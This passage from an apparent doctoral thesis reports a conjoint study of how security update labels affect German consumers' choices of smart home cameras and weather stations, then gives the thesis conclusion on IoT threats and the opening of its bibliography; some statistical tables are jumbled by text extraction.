As listed in Table 7.6, the availability of security updates (31%) is the most important attribute for smart home cameras. It is twice as important as price (15%) and provisioning time for security updates (14%). Other functional attributes are less important with relative importance between 8% and 12%. For the smart weather stations, the availability of security updates (20%) is also the most important attribute. However, the difference in importance to other product attributes is smaller than for the smart home cameras. The relative importance of price, rain and wind sensor, and provisioning time for security updates are at around 16%. All other attributes are ranked with relative importances between 7% and 13%.

140 7.6 Conjoint Analysis

Table 7.6: Relative importance of product attributes. Smart Home Camera (n=731) Smart Weather Station (n=735) Rank Attribute µ [%] σ [%] Attribute µ [%] σ [%] 1. Availability1 30.57 9.82 Availability1 20.37 9.28 2. Price 15.12 8.86 Price 16.64 11.03 3. Provisioning time2 13.98 6.30 Rain/wind sensor 16.37 9.87 4. Resolution 12.05 8.98 Provisioning time2 16.12 7.96 5. Frame rate 10.71 6.06 Expandability 13.15 8.14 6. Field of view 8.89 5.29 Battery lifetime 9.82 6.53 7. Zoom function 8.68 6.72 Precision 7.53 4.84

1Availability of security updates, 2Provisioning time for security updates

In general, the relative importance of the attributes differ between both product cate- gories. Good research practice, e.g., [23], strongly discourages quantitative comparison of preference measurements of different product categories to each other, as the importance of an attribute can only be interpreted as relative value within the particular product cat- egory. Therefore, we discuss the possible differences qualitatively. For the product with the high perceived security risk, especially the availability of security updates (twice as important as other attributes) seems to play a more crucial role in buying decisions than for the product with the low perceived security risk (only slightly more important than other attributes). Furthermore, the provisioning time for security updates is considered the third most important attribute for the product with the high perceived security risk and the fourth most important attribute for the product with the low perceived security risk. Thus, the provisioning time for security updates seems to have a similar importance than price and other highly-ranked technical attributes. To summarize, the availability of security updates plays the most important role in the consumers’ choice in this study. The relative importance of the provisioning time for secu- rity updates is also high, although substantially lower than of the availability of security updates. For both product categories, the second most important attribute is the price. Functional features of both product categories are rated as less important than the at- tributes of the security update label and price, except the rain and wind sensor for smart weather stations. Table 7.7 shows the average utilities that consumers ascribe to the levels of product at- tributes [225]. Negative utilities represent unfavorable options compared to the other options, while positive utilities describe the favorable options. The utilities of all levels of a certain product attribute add up to zero. For the price attribute, lower prices have a higher utility for consumers. For both product categories, the non-availability of secu- rity updates is considered as especially unfavorable with the highest negative utility scores among all attributes. The availability of security updates for 6 years is more favorable than for 2 years. The utility for the provisioning time for security updates shows a preference

141 7 Security Update Labels

Table 7.7: Average utilities of selected product attributes. Smart Smart Attribute Level Home Weather Camera Station 100e 33.64 44.13 120e 19.46 21.08 Price 140e -5.66 -9.33 160e -47.45 -55.88 none -111.93 -77.52 Availability of security updates until 12/2020 (2 years) 14.32 21.91 until 12/2024 (6 years) 97.61 55.61 none -32.82 -61.10 Provisioning time for sec. updates within 10 days 37.16 43.75 within 30 days -4.34 17.35

Utilities of all levels of a certain product attribute add up to zero. for short time period (10 days) rather than a longer time period (30 days). A provisioning time of 30 days has a negative utility for the smart home camera, in contrast to the smart weather station. Thus, participants dislike long provisioning times for a product with high perceived security risk.

7.6.6 Validity

We tested the internal consistency of our results by comparing simulations based on the preference measurement results with choice data from holdout tasks (cf. Section 7.6.1). Furthermore, we validated the preference for long availability periods and short provision- ing times. The results of the holdout tasks were not included into the calculation of the preference measurement results. For the holdout tasks, we defined five product profiles – P1, P2, P3a, P3b, P4 – for each product category. Profiles P3a and P3b differ only in their security update label attributes: In P3a, there was no guarantee for the availability and provisioning time of security updates. In P3b, these two attributes were set to the objectively best levels: availability of security updates for 6 years with provisioning time of 10 days. In the course of the survey, each respondent performed 10 choice tasks, of which 8 were randomly-generated tasks and 2 were fixed holdout tasks. The fixed holdout tasks were the same for all respondents of a product category and appeared as the 4th and 8th of the 10 choice tasks. Both holdout task consisted of the four product profiles that were presented in a different fixed order. In the first holdout task (i.e., the 4th choice task), the

142 7.6 Conjoint Analysis

Table 7.8: Comparing the market estimation regarding shares of preferences of four pre- defined product configurations with real preferences in fixed holdout tasks. Smart Home Camera Smart Weather Station Holdout Task 1 Holdout Task 2 Holdout Task 1 Holdout Task 2 P1, P2, P3a, P4 P4, P3b, P2, P1 P1, P2, P3a, P4 P4, P3b, P2, P1 Product Profile Estimated Real Estimated Real Estimated Real Estimated Real P1 1.5% 2.7% 1.4% 2.9% 1.7% 3.3% 1.5% 2.7% P2 4.8% 11.4% 2.4% 5.7% 22.1% 21.0% 15.8% 16.5% P3 3.6% 6.6% 58.8% 53.4% 5.3% 9.5% 36.5% 32.7% P4 84.4% 72.8% 34.6% 35.6% 61.1% 57.1% 39.0% 42.0% None 5.7% 6.6% 2.8% 2.5% 9.7% 9.1% 7.1% 6.1%

P3a and P3b differ only in the security update label attributes: P3a does not guarantee security updates, whereas P3b guarantees availability of security updates until 2024 (6 years) and a provisioning time within 10 days.

profiles (P1, P2, P3a, P4) were presented. In the second holdout task (i.e., the 8th choice task), the profiles (P4, P3b, P2, P1) were presented.

The results in Table 7.8 (‘Real’-columns) for smart home cameras show that in the first holdout task 6.6% decided for P3a without guarantee for security updates, while in the second holdout task 53.4% chose P3b with best guarantee for security updates. The same effect can be observed for the smart weather station: in the first choice task, 9.5% choose P3a, while 32.7% decided for P3b. This validates the results that we derived from the randomly-generated choice tasks: The (non-)availability of security updates is an important factor in buying decisions, while this effect seems to be higher for products with high perceived security risk.

We tested the consistency of the hierarchical Bayes estimation with the market simulator from Lighthouse Studio, which represents a standard procedure to assess the internal validity of CBC models [218]. This market simulator estimates the shares of preferences for the product profiles P1 to P4 based on the preference measurement results of the conjoint analysis. We compared the estimated market shares with the evidence gathered through the holdout tasks (see Table 7.8). For example, in the first holdout task of the smart home camera, the market simulator estimated a market share of 84.4% for P4, while the evaluation of the real choices showed that 72.8% of the respondents decided for P4. Based on the comparison of estimated and real choices, we conclude that although the simulator does not exactly match the real choices, the preference measurement results are robust in estimating the order and magnitude of the overall preferences, which indicates a high consistency of the results.

143 7 Security Update Labels

Table 7.9: Consumer segmentation via latent-class analysis. Smart Home Camera Group 1 Group 2 n1 488 243 Group 1 vs Group 2 female 42.6% 44.9% Gender 2(1) = 0 42 = 0 024 male 55.9% 53.1% χ . ,V . Age µ [years] 33.0 33.9 t(729) = −1.10, d = −0.09 none 9.2% 11.9% Vocational vocational 38.7% 42.8% 2(2) = 3 35 = 0 068 qualification χ . ,V . academic 52.0% 45.3% Monthly net income3 (µ [e]) 1704 1706 t(599) = −0.22, d = 0.002 Professional IT yes 18.5% 17.7% 2(1) = 0 06 = 0 01 background no 81.5% 82.3% χ . ,V . Privacy concerns 4.48 4.59 t(729) = −0.98, d = −0.08 Security behavior intention 3.59 3.56 t(729) = 0.59, d = 0.05 Perceived security risk 5.44 5.61 t(729) = −2.13*, d = −0.17 Smart Weather Station Group 1 Group 2 Group 3 Group 1 vs Group 2 n1 182 221 332 vs Group 32 female 43.4% 50.2% 40.1% Gender 2(2) = 4 40 = 0 08 male 53.8% 49.8% 58.7% χ . ,V . Age µ [years] 36.9 34.8 32.8 F (2, 732) = 8.00**, r = 0.15 none 8.2% 11.8% 12.3% Vocational vocational 37.9% 43.0% 37.7% 2(4) = 68 31** = 0 22 qualification χ . ,V . academic 53.8% 45.2% 50.0% Monthly net income3 (µ [e]) 1854 1707 1532 F (2, 619) = 3.73*, r = 0.11 Professional IT yes 13.7% 17.2% 17.8% 2(2) = 0 37 = 0 02 background no 81.3% 81.4% 80.4% χ . ,V . Privacy concerns 4.54 4.57 4.26 F (2, 732) = 3.86*, r = 0.10 Security behavior intention 3.70 3.67 3.47 F (2, 732) = 16.74**, r = 0.17 Perceived security risk 3.88 3.96 3.32 F (2, 732) = 10.31**, r = 0.21 Notation: Statistically significant with *p < 0.05, **p < 0.01, 1If missing values appear for specific variables, respective analyses rely on a diverging number of cases. 2Post-hoc tests are given in Table 7.11. 3Income data were processed following the methodology of the German sample census [175].

144 7.6 Conjoint Analysis

Table 7.10: Product attribute importance of consumer groups. Smart Home Camera Rank Group 1 (n = 488) Group 2 (n = 243) 1. Availability1 31.42% Availability1 25.26% 2. Resolution 16.47% Provisioning time2 19.03% 3. Price 11.82% Price 16.66% 4. Frame rate 10.68% Field of view 11.64% 5. Zoom function 10.48% Frame rate 9.26% 6. Provisioning time2 10.22% Resolution 9.17% 7. Field of view 8.91% Zoom function 8.98%

Smart Weather Station Rank Group 1 (n = 182) Group 2 (n = 221) Group 3 (n = 332) 1. Availability1 23.41% Availability1 35.24% Price 29.98% 2. Rain/wind sensor 23.14% Provisioning time2 24.62% Rain/wind sensor 20.55% 3. Provisioning time2 19.38% Expandability 12.95% Battery Lifetime 13.46% 4. Expandability 15.90% Battery Lifetime 8.12% Expandability 12.88% 5. Price 8.49% Rain/wind sensor 7.11% Precision 8.49% 6. Battery Lifetime 5.26% Precision 6.19% Availability1 8.01% 7. Precision 4.44% Price 5.76% Provisioning time2 6.64%

1Availability of security updates, 2Provisioning time for security updates

7.6.7 Segmentation

We used the latent class segmentation module of Lighthouse Studio to assign respondents to groups that have similar preferences. The module implements latent class analysis, a classification technique to find groups in multi-dimensional data. First, we needed a measure to decide in how many reasonable segments we split the respondents. Following recommendations of Sawtooth Software [260], we used the consistent Akaike’s information criterion [33] as measure. Based on this criterion, we decided to split the respondents of the product categories “smart home camera” and “smart weather station” into two and three segments, respectively. The consumer segmentation for both product categories is shown in Table 7.9. The differences in preferences between the segments are given in Table 7.10. For the smart home camera, both segments differ statistically significantly only in the per- ceived security risk. For the first group with lower security risk perception towards smart home cameras, the availability of security updates (31%) is the most important product attribute and twice as important as resolution (16%) and price (12%). In comparison to the importance of technical features (9–11%) other than the resolution, the availability of security updates is even three times more important. For the second group with the higher

145 7 Security Update Labels

Table 7.11: Post-hoc tests (Tukey HSD) for segmentation. Smart Weather Station Groups MD1 p 95%-CI2 d 1 vs 2 2.14 0.14 [−0.51, 4.80] 0.19 Age 1 vs 3 4.12 0.00 [1.68, 6.57] 0.37 2 vs 3 1.98 0.11 [−0.32, 4.28] 0.17 1 vs 2 146.95 0.50 [−158.63, 452.53] 0.11 Monthly net income 1 vs 3 322.04 0.02 [37.85, 606.49] 0.26 2 vs 3 175.09 0.26 [−85.76, 435.94] 0.15 1 vs 2 −0.03 0.97 [−0.37, 0.31] 0.02 Privacy Concerns 1 vs 3 0.28 0.09 [−0.03, 0.59] 0.20 2 vs 3 0.31 0.03 [0.02, 0.60] 0.22 1 vs 2 0.03 0.89 [−0.12, 0.18] 0.06 Security behavior intentions 1 vs 3 0.23 0.00 [0.09, 0.36] 0.39 2 vs 3 0.20 0.00 [0.07, 0.33] 0.47 1 vs 2 −0.08 0.84 [−0.41, 0.25] 0.05 Perceived security risk 1 vs 3 0.56 0.00 [0.25, 0.86] 0.36 2 vs 3 0.63 0.00 [0.35, 0.92] 0.31 Notation: 1mean difference, 295%-confidence interval security risk perception, the availability (25%) and provisioning time (19%) of security up- dates are the most important product attributes followed by price (17%). Compared to the importance of the technical features (9–12%), availability and provisioning time are (almost) twice as important. For the smart weather station, the segments differ statistically significantly with regard to age, vocational qualification, income, privacy concerns, security behavior intentions, and perceived security risk. The first group exhibits the highest average age, high vocational qualifications, the highest income, high privacy concerns, the highest security behavior intentions, as well as a high security risk perception towards smart weather stations. For this group, the availability of security updates (23%) as well as the rain and wind sensor (23%) are the most important product attributes, followed by provisioning time (20%) and expandability (16%). These attributes are 2 to 3 times as important as the price (8%). The second group is characterized by lower vocational qualification, the highest privacy concerns, and the highest perceived security risk. For this group, the attributes of the security update label dominate the choice decision and account for 60% of the overall importance. The availability (35%) and provisioning time (25%) is three and two times as important, respectively, than technical features. For this group, the price (6%) is the least important attribute for their choice. The third group perceives the lowest risk for smart weather stations. This group is the

146 7.7 Discussion youngest on average, has the lowest income, as well as the lowest privacy concerns and security behavior intentions. The most important product attribute is the price (30%), followed by technical features, such as rain and wind sensor (21%) and battery lifetime (13%). The availability (8%) and provisioning time (7%) are the least important at- tributes, i.e., the security update label plays only a minor role in the consumers’ choice of this segment.

7.7 Discussion

We discuss research questions formulated in Section 7.4, and consider economic and policy implications of our results. RQ1: Relative importance of the availability period and provisioning time. The availability of security updates was the product attribute with the highest relative importance (up to twice as important as other high-ranked attributes) as well as with the widest span of average utility (Table 7.6). Provisioning time for security updates was evaluated as less important than their availability, but seems to be more important than most technical features. Consumers also prefer short provisioning times, and even assign a negative utility (i.e., dislike) to the provisioning time of 30 days for the product with the high perceived security risk (Table 7.7). The high importance of the attributes of the security update label is surprising, as users are not familiar with these attributes. This might be due to the explicit mentioning of the non-availability of security updates that might have discouraged the users. This effect can be seen in Table 7.7 where the negative utility of non- availability is greater (-111.93 for home cameras and -77.52 for weather stations) than the positive utility of availability of security updates for 6 years (97.61 and 55.61, respectively). This indicates that consumers want to avoid the non-availability of security updates, and therefore, the mandatory nature of the security update label is very important. RQ2: Differences between products with a low and high perceived security risk. We ob- served differences in the relative importance of the security update attributes. For the product with the high perceived security risk, the importance of availability is at least twice as high as the importance of other attributes. In contrast, availability is only slightly more important than for other high-ranked attributes for the product with a low perceived security risk. Furthermore, for the product with the high perceived security risk, the re- sults of the holdout tasks (cf. Table 7.8, ‘Real’-columns) show an increase of preference for product profile P3a from 6.6% (without guaranteed security update) to 53.4% for profile P3b (with 6-year guarantee for security updates). For the product with the low perceived security risk, there is a comparatively smaller increase from 9.5% to 32.7% in the prefer- ence for the analogous product profiles. Also, if we sum up the importance of both label attributes, the security update label shows a relative importance of 45% for the consumers’ choice regarding the product with the high perceived security risk, compared to 36% for the product with the low perceived security risk. This finding supports the concern of moral hazard (Section 7.3.4): Users might consider

147 7 Security Update Labels security update labels primarily if they think that they could be personally affected by security incidents. In reality, however, products with seemingly low perceived security risk for the owner can be used for serious attacks. For example, Mirai utilized digital video recorders [12]. We conclude that the introduction of security update labels might need educational campaigns that explain non-personal security risks associated with IoT devices. RQ3: Differences due to demographic characteristics of the consumers. The sample seg- mentation for the product with high perceived security risk did not show any differences in demographic factors (Table 7.9). For the product with low perceived security risk, the segmentation showed statistically significant differences in terms of age, vocational qual- ification, and income. The groups with higher age and higher income assigned a higher importance to the security update label attributes (Table 7.10). This could indicate that this type of consumers may invest more in sustainable security of their IoT devices. In contrast, the group with the youngest age and lowest income seems not to care much about security updates. We conclude that for products with a high perceived security risk, demographics may play a minor role, whereas for the products with lower perceived security risk, younger population with lower income may prefer cheaper products with lower security. RQ4: Differences due to security behavior intentions, privacy concerns, and security risk perception of the consumers. While the segmentation of the product category with the high perceived security risk showed only minor differences between the groups, the groups for the product category with the low perceived security risk range from very low to very high importance of the security update label. There, the respondents with higher security behavior intentions and privacy concerns exhibit a higher preference for the attributes of the security update label. For both product categories, a higher security risk perception positively relates to the higher importance of the security update label’s attributes. This indicates that consumers with a higher sensitivity for security risks and privacy concerns may assign a higher importance to the security update labels.

Limitations and Future Work. The results of the user study have the usual limitations of conjoint analysis studies. For the comparison of products, we had to limit the number of product attributes and discretize attribute levels. Also, some product attributes, such as product design, were discarded due to impracticality of the specification of attribute levels. Although we specified product attributes and attribute levels based on best practices and empirical evidence, a product profile cannot fully represent all factors that may influence buying decisions, such as product presentation, packaging, advertisement campaigns, and consumer ratings. Usability aspects of update mechanisms might also influence the con- sumers’ choice. Another limitation might be due to the evaluation of stated preferences (i.e., hypothetical buying decisions). However, the assessment of real buying decisions was infeasible as there are no suitable products that guarantee security updates. Finally, as we ran the user study with German respondents, the results might not be valid for other markets. Thus, future work is required to investigate the impact of security update labels

148 7.8 Conclusion in other countries, and with different sets of participants, products, and attributes. As we focused on the consumers’ choice in this work, future work should also consider the positions of manufacturers and policy makers.

Economic Implications. Security update guarantees may create additional costs for the manufacturers that will be potentially passed on to the consumers [44]. Are consumers willing to bear these costs? CBC analyses are not appropriate to precisely estimate con- sumers’ willingness to pay for a certain attribute. However, attribute levels with a high importance for consumers’ choices also indicate a willingness to pay a higher price for prod- ucts with this attribute level [203]. In addition, initial support for the willingness to pay a price premium is provided by studies that show that consumers perceive price increases as fair if they are caused by higher costs for a manufacturer [148, 29, 160]. Prior works [74, 243] also concluded that consumers accept additional costs for security depending on the product’s perceived security risk.

Policy Implications. Our results show that mandatory security update labels could in- deed have a high influence on the consumers’ choices. The labels communicate attributes that enable non-experts to compare security properties of different IoT products intuitively during the purchase process, and thereby influence buying decisions. The introduction of security update labels might increase security of IoT consumer products through estab- lishing economic incentives for manufacturers to guarantee a long and timely availability of security updates, or, from another perspective, creating competitive disadvantages for the non-availability of security updates. These labels could strengthen the state of IoT security in the long term, as unpatched IoT consumer products are a major reason behind today’s IoT security incidents.

7.8 Conclusion

Security update labels benefit consumers, as they decrease the probability of becoming a victim to disclosed but unpatched vulnerabilities. They have the potential to motivate manufacturers to invest more resources in the provision of security updates, which might lead to positive security-related changes in their business strategies. Finally, national security will also profit from these labels, as they strengthen the security of the private IoT infrastructure, and therefore, reduce the attack surface for malicious domestic and foreign actors.

149 150 Chapter 8

Conclusion and Future Work

In the last twenty years, the Internet extended from digital spheres into the physical world. New applications emerged that brought many advancements to private, public, and industrial spaces and their users. However, this technological revolution of the IoT also introduced new threat vectors. In the first part of this thesis, we investigated the landscape of IoT threats from a technical perspective. The proposed threat taxonomy classified threats into three categories: The threats of information leakage, connectivity misuse, and object exploitation. The first category, the threat of information leakage, is based on the assumption that attackers have access to data collected by IoT objects and applications. Through analyzing collected data, the attacker can gain valuable information about the state, environment, and users of a specific IoT system. In a case study, we showed that attackers are able to interfere with the users’ privacy through analyzing room climate data collected by smart heating applications. In future work, following research questions could be addressed: How would the fusion of different types of typical smart home sensors improve the detection of activities? To which extent can IoT-generated data be used for reconstruction of events in criminal investigations? What techniques can be applied to any data collection from sensitive IoT applications to minimize privacy implications? The second category, the threat of connectivity misuse, allows attackers to abuse the inter-connectability of IoT objects as well as the IoT infrastructure. In a case study, we demonstrated the threat of malicious hardware elements that communicate with the at- tacker over a public IoT infrastructure. Future work might investigate research questions, such as: To which extent can be the physical appearance of malicious IoT implants re- alistically minimized? What further detection mechanisms can be developed to protect against malicious IoT hardware elements? How can public IoT infrastructures be protected against misuse? Finally in the third category, the threat of object exploitation, IoT objects and applica- tions are misused to tamper with the physical world. In a case study, we revealed and examined a number of insecurities in the commissioning of the ZigBee smart home network standard. Exploiting the weak security of this standard, attackers are able to take-over IoT objects within the wireless range, ranging from non-critical light bulbs to security- critical door locks. As the IoT highly relies on standardized communication technologies, the analysis of further network protocols as future work is required. Especially wireless low-power standards will play an important role within the IoT and the future 5G net- working. Potential research questions include: How does the reduced protocol complexity

151 8 Conclusion and Future Work in low-power standards affect the security design? What techniques exist to securely join factory-new IoT objects to existing networks without the requirement of pre-shared key material? In the second part of this thesis, we examined the security of IoT consumer products from an economic perspective. In particular, we performed a root cause analysis regarding the security vulnerabilities of the ZigBee standard and concluded that the insufficient security design resulted at least partly from missing economic incentives. To incentivize manufacturers for developing comprehensive and sustainable security architectures, we proposed security update labels and examined their impact on the consumer’s choice. These labels transform the asymmetric information about the manufacturers’ willingness to provide future security updates into an assessable and comparable feature. The results of the user study show that these labels indeed influence buying decisions of consumers in favor towards manufacturers that guarantee security updates for a long time. Thus, they have the potential to create economic incentives for manufacturers to put more effort in providing sustainable security support for their products. IoT security and privacy economics are a promising and mainly unexplored research direc- tion. Currently, the understanding is limited how economic principals can be leveraged to increase the security and privacy of IoT systems and applications. However, the develop- ment and release of IoT products is largely influenced by financial motivations, which does not only affect the consumer but also the business segment. Interesting research questions might be: What is the willingness to pay a price premium for secure IoT objects? Do the user preferences regarding the security of IoT objects differ between cultural backgrounds? How can economic approaches be leveraged to improve the privacy of sensitive IoT appli- cations? Answering such questions could enable policymakers to establish incentives for higher and more sustainable levels of security and privacy in future IoT products.

152 Bibliography

[1] M. Abomhara and G. M. Køien, “Cyber security and the Internet of Things: Vulnerabilities, threats, intruders and attacks,” Journal of Cyber Security, vol. 4, no. 1, pp. 65–88, January 2015. [Online]. Available: https://doi.org/10.13052/jcsm2245-1439.414 [2] A. Acquisti, A. Friedman, and R. Telang, “Is there a cost to privacy breaches? An event study,” in Proceedings of the International Conference on Information Systems, ICIS 2006, Milwaukee, Wisconsin, USA, December 10-13, 2006. Association for Information Systems, 2006, p. 94. [Online]. Available: http://aisel.aisnet.org/icis2006/94 [3] F. Adelantado, X. Vilajosana, P. Tuset-Peir´o,B. Mart´ınez, J. Meli`a-Segu´ı, and T. Watteyne, “Understanding the limits of LoRaWAN,” IEEE Communications Magazine, vol. 55, no. 9, 2017. [Online]. Available: https://doi.org/10.1109/MCOM. 2017.1600613 [4] D. Agrawal, S. Baktir, D. Karakoyunlu, P. Rohatgi, and B. Sunar, “Trojan detection using IC fingerprinting,” in 2007 IEEE Symposium on Security and Privacy (S&P 2007), 20-23 May 2007, Oakland, California, USA. IEEE Computer Society, 2007, pp. 296–310. [Online]. Available: https://doi.org/10.1109/SP.2007.36 [5] B. Ai, Z. Fan, and R. X. Gao, “Occupancy estimation for smart buildings by an auto-regressive hidden Markov model,” in American Control Conference, ACC 2014, Portland, OR, USA, June 4-6, 2014. IEEE, 2014, pp. 2234–2239. [Online]. Available: http://dx.doi.org/10.1109/ACC.2014.6859372 [6] G. A. Akerlof, “The market for ”lemons”: Quality uncertainty and the market mechanism,” The Quarterly Journal of Economics, vol. 84, no. 3, pp. 488–500, 1970. [Online]. Available: http://www.jstor.org/stable/1879431 [7] O. H. Alhazmi, Y. K. Malaiya, and I. Ray, “Measuring, analyzing and predicting security vulnerabilities in software systems,” Computers & Security, vol. 26, no. 3, pp. 219–228, 2007. [Online]. Available: https://doi.org/10.1016/j.cose.2006.10.002 [8] M. I. Alpert, “Identification of determinant attributes: A comparison of methods,” Journal of Marketing Research, vol. 8, no. 2, pp. 184–191, 1971. [Online]. Available: http://www.jstor.org/stable/3149759 [9] R. Anderson, “Why information security is hard - An economic perspective,” in 17th Annual Computer Security Applications Conference (ACSAC 2001), 11-14 December 2001, New Orleans, Louisiana, USA. IEEE Computer Society, 2001, pp. 358–365. [Online]. Available: http://dx.doi.org/10.1109/ACSAC.2001.991552 [10] R. Anderson and S. Fuloria, “On the security economics of electricity

153 Bibliography

metering,” in 9th Annual Workshop on the Economics of Information Security, WEIS 2010, Harvard University, Cambridge, MA, USA, June 7-8, 2010, 2010. [Online]. Available: http://weis2010.econinfosec.org/papers/session5/weis2010 anderson r.pdf

[11] R. Anderson and T. Moore, “The economics of information security,” Science, vol. 314, no. 5799, pp. 610–613, 2006. [Online]. Available: http://science.sciencemag. org/content/314/5799/610.full.pdf [12] M. Antonakakis, T. April, M. Bailey, M. Bernhard, E. Bursztein, J. Cochran, Z. Durumeric, J. A. Halderman, L. Invernizzi, M. Kallitsis, D. Kumar, C. Lever, Z. Ma, J. Mason, D. Menscher, C. Seaman, N. Sullivan, K. Thomas, and Y. Zhou, “Understanding the Mirai botnet,” in 26th USENIX Security Symposium, USENIX Security 2017, Vancouver, BC, Canada, E. Kirda and T. Ristenpart, Eds. USENIX Association, 2017, pp. 1093–1110. [Online]. Available: https://www.usenix.org/conference/usenixsecurity17/technical- sessions/presentation/antonakakis [13] J. Appelbaum, J. Horchert, and C. St¨ocker, “Shopping for spy gear: Catalog advertises NSA toolbox,” Spiegel Online International, vol. 29, 2013. [Online]. Available: http://www.spiegel.de/international/world/catalog-reveals- nsa-has-back-doors-for-numerous-devices-a-940994.html [14] F. Armknecht, Z. Benenson, P. Morgner, and C. M¨uller,“On the security of the ZigBee light link touchlink commissioning procedure,” in International Workshop on Security, Privacy and Reliability of Smart Buildings, 2016, pp. 229–240. [Online]. Available: https://dl.gi.de/20.500.12116/874 [15] F. Armknecht, Z. Benenson, P. Morgner, C. M¨uller, and C. Riess, “Privacy implications of room climate data,” Journal of Computer Security, vol. 27, no. 1, pp. 113–136, 2019. [Online]. Available: https://content.iospress.com/articles/journal- of-computer-security/jcs181133

[16] K. Ashton, “That ‘Internet of Things’ thing,” RFiD Journal, vol. 22, no. 7, pp. 97–114, 2009. [Online]. Available: https://www.rfidjournal.com/articles/view?4986 [17] D. Astely, E. Dahlman, A. Furusk¨ar,Y. Jading, M. Lindstr¨om,and S. Parkvall, “LTE: The evolution of mobile broadband,” IEEE Communications Magazine, vol. 47, no. 4, pp. 44–51, 2009. [Online]. Available: https://doi.org/10.1109/ MCOM.2009.4907406 [18] A. Avizienis, J. Laprie, B. Randell, and C. E. Landwehr, “Basic concepts and taxonomy of dependable and secure computing,” IEEE Trans. Dependable Sec. Comput., vol. 1, no. 1, pp. 11–33, 2004. [Online]. Available: https://doi.org/10. 1109/TDSC.2004.2 [19] Y. Bachy, F. Basse, V. Nicomette, E. Alata, M. Kaˆaniche, J. Courr`ege, and P. Lukjanenko, “Smart-TV security analysis: Practical experiments,” in 45th

154 Bibliography

Annual IEEE/IFIP International Conference on Dependable Systems and Networks, DSN 2015, Rio de Janeiro, Brazil, June 22-25, 2015. IEEE Computer Society, 2015, pp. 497–504. [Online]. Available: https://doi.org/10.1109/DSN.2015.41 [20] Z. Bakhshi, A. Balador, and J. Mustafa, “Industrial IoT security threats and concerns by considering Cisco and Microsoft IoT reference models,” in 2018 IEEE Wireless Communications and Networking Conference Workshops, WCNC 2018 Workshops, Barcelona, Spain, April 15-18, 2018. IEEE, 2018, pp. 173–178. [Online]. Available: https://doi.org/10.1109/WCNCW.2018.8368997 [21] S. Barge and H. Gehlbach, “Using the theory of satisficing to evaluate the quality of survey data,” Research in Higher Education, vol. 53, no. 2, pp. 182–200, March 2012. [Online]. Available: https://doi.org/10.1007/s11162-011-9251-2 [22] I. Bastys, M. Balliu, and A. Sabelfeld, “If this then what?: Controlling flows in IoT apps,” in Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security, CCS 2018, Toronto, ON, Canada, October 15-19, 2018, D. Lie, M. Mannan, M. Backes, and X. Wang, Eds. ACM, 2018, pp. 1102–1119. [Online]. Available: https://doi.org/10.1145/3243734.3243841 [23] B. Baumgartner and W. J. Steiner, “Are consumers heterogeneous in their preferences for odd and even prices? Findings from a choice-based conjoint study,” International Journal of Research in Marketing, vol. 24, no. 4, pp. 312–323, 2007. [Online]. Available: http://www.sciencedirect.com/science/article/ pii/S0167811607000456 [24] G. T. Becker, F. Regazzoni, C. Paar, and W. P. Burleson, “Stealthy dopant-level hardware trojans,” in Cryptographic Hardware and Embedded Systems - CHES 2013 - 15th International Workshop, Santa Barbara, CA, USA, August 20- 23, 2013. Proceedings, ser. Lecture Notes in Computer Science, G. Bertoni and J. Coron, Eds., vol. 8086. Springer, 2013, pp. 197–214. [Online]. Available: https://doi.org/10.1007/978-3-642-40349-1 12 [25] K. Blind and A. Mangelsdorf, “Motives to standardize: Empirical evidence from Germany,” Technovation, vol. 48–49, pp. 13–24, 2016. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S016649721600002X [26] B. Bloessl, C. Leitner, F. Dressler, and C. Sommer, “A GNU radio- based IEEE 802.15.4 testbed,” 12. GI/ITG Fachgespr¨achSensornetze, pp. 37–40, September 2013. [Online]. Available: https://opus4.kobv.de/opus4- btu/frontdoor/deliver/index/docId/2805/file/CSR 03 13.pdf [27] Bluetooth SIG, “Bluetooth core specification v5.0,” December 2016. [Online]. Available: https://www.bluetooth.com/specifications [28] A. Bolshev, J. Larsen, M. Krotofil, and R. Wightman, “A rising tide: Design exploits in industrial control systems,” in 10th USENIX Workshop on Offensive Technologies, WOOT 16, Austin, TX, USA, August 8-9, 2016., N. Silvanovich and

155 Bibliography

P. Traynor, Eds. USENIX Association, 2016. [Online]. Available: https://www. usenix.org/conference/woot16/workshop-program/presentation/bolshev [29] L. E. Bolton, L. Warlop, and J. W. Alba, “Consumer perceptions of price (un)fairness,” Journal of Consumer Research, vol. 29, no. 4, pp. 474–491, 03 2003. [Online]. Available: https://doi.org/10.1086/346244 [30] I. Bouij-Pasquier, A. A. E. Kalam, A. A. Ouahman, and M. D. Montfort, “A security framework for Internet of Things,” in Cryptology and Network Security - 14th International Conference, CANS 2015, Marrakesh, Morocco, December 10-12, 2015, Proceedings, ser. Lecture Notes in Computer Science, M. Reiter and D. Naccache, Eds., vol. 9476. Springer, 2015, pp. 19–31. [Online]. Available: https://doi.org/10.1007/978-3-319-26823-1 2 [31] J. Boyens, C. Paulsen, R. Moorthy, N. Bartol, and S. A. Shankles, “Supply chain risk management practices for federal information systems and organizations,” NIST SP 800-161, April 2015. [Online]. Available: http://dx.doi.org/10.6028/NIST.SP.800- 161 [32] W. Boyer and M. McQueen, “Ideal based cyber security technical metrics for con- trol systems,” in Critical Information Infrastructures Security, J. Lopez and B. M. H¨ammerli,Eds. Berlin, Heidelberg: Springer Berlin Heidelberg, 2008, pp. 246–260. [33] H. Bozdogan, “Model selection and Akaike’s Information Criterion (AIC): The general theory and its analytical extensions,” Psychometrika, vol. 52, no. 3, pp. 345–370, September 1987. [Online]. Available: https://doi.org/10.1007/BF02294361 [34] P. J. Buckley, K. W. Glaister, E. Klijn, and H. Tan, “Knowledge accession and knowledge acquisition in strategic alliances: The impact of supplementary and complementary dimensions,” British Journal of Management, vol. 20, no. 4, pp. 598–609, 2009. [Online]. Available: https://onlinelibrary.wiley.com/doi/abs/10. 1111/j.1467-8551.2008.00607.x [35] Busch-Jaeger, “ZigBee Light Link – This is how easy it is to create the right atmosphere with light,” 2017. [Online]. Available: https://www.busch- jaeger.de/en/products/product-solutions/remote-control/zigbee-light-link/ [36] California Legislative Information, “SB-327 Information privacy: Connected devices,” September 2018. [Online]. Available: http://leginfo.legislature.ca.gov/ faces/billTextClient.xhtml?bill id=201720180SB327 [37] Cambridge Dictonary, “The Internet of Things definition,” 2018. [Online]. Available: https://dictionary.cambridge.org/us/dictionary/english/internet-of-things [38] L. M. Candanedo and V. Feldheim, “Accurate occupancy detection of an office room from light, temperature, humidity and CO2 measurements using statistical learning models,” Energy and Buildings, vol. 112, pp. 28–39, 2016. [Online]. Available: 